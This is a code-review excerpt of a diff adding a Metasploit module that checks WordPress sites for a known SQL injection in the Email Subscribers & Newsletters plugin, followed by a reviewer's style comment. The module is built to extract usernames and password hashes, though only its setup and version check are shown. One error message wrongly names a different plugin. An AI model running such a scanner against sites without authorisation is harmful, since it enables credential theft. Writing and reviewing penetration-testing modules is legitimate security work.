modules/auxiliary/scanner/http/wp_email_sub_news_sqli.rb

```diff
@@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::SQLi
+  require 'metasploit/framework/hashes/identify'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Email Subscribers and Newsletter Hash SQLi Scanner',
+        'Description' => %q{
+          Email Subscribers & Newsletters plugin contains an unauthenticated timebased SQL injection in
+          versions before 4.3.1.  The vulnerable parameter is in the `hash` parameter.
+        },
+        'Author' =>
+          [
+            'h00die', # msf module
+            'red0xff', # sqli libs in msf
+            'Wordfence' # blog post says team, no individual(s) called out for discovery
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            [ 'EDB', '48699' ],
+            [ 'CVE', '2019-20361' ],
+            [ 'URL', 'https://www.wordfence.com/blog/2019/11/multiple-vulnerabilities-patched-in-email-subscribers-newsletters-plugin/' ]
+          ],
+        'Actions' => [
+          ['List Users', 'Description' => 'Queries username, password hash for COUNT users'],
+        ],
+        'DefaultAction' => 'List Users',
+        'DisclosureDate' => '2019-11-13'
+      )
+    )
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of users to enumerate', 1])
+    ]
+  end
+
+  def run_host(ip)
+    unless wordpress_and_online?
+      vprint_error('Server not online or not detected as wordpress')
+      return
+    end
+
+    checkcode = check_plugin_version_from_readme('email-subscribers', '4.3.1')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      vprint_error('Loginizer version not vulnerable')
+      return
+    else
+      print_good('Vulnerable version detected')
+    end
```

Comment:
Redundant `else` after `return`.

```suggestion
    end

    print_good('Vulnerable version detected')
```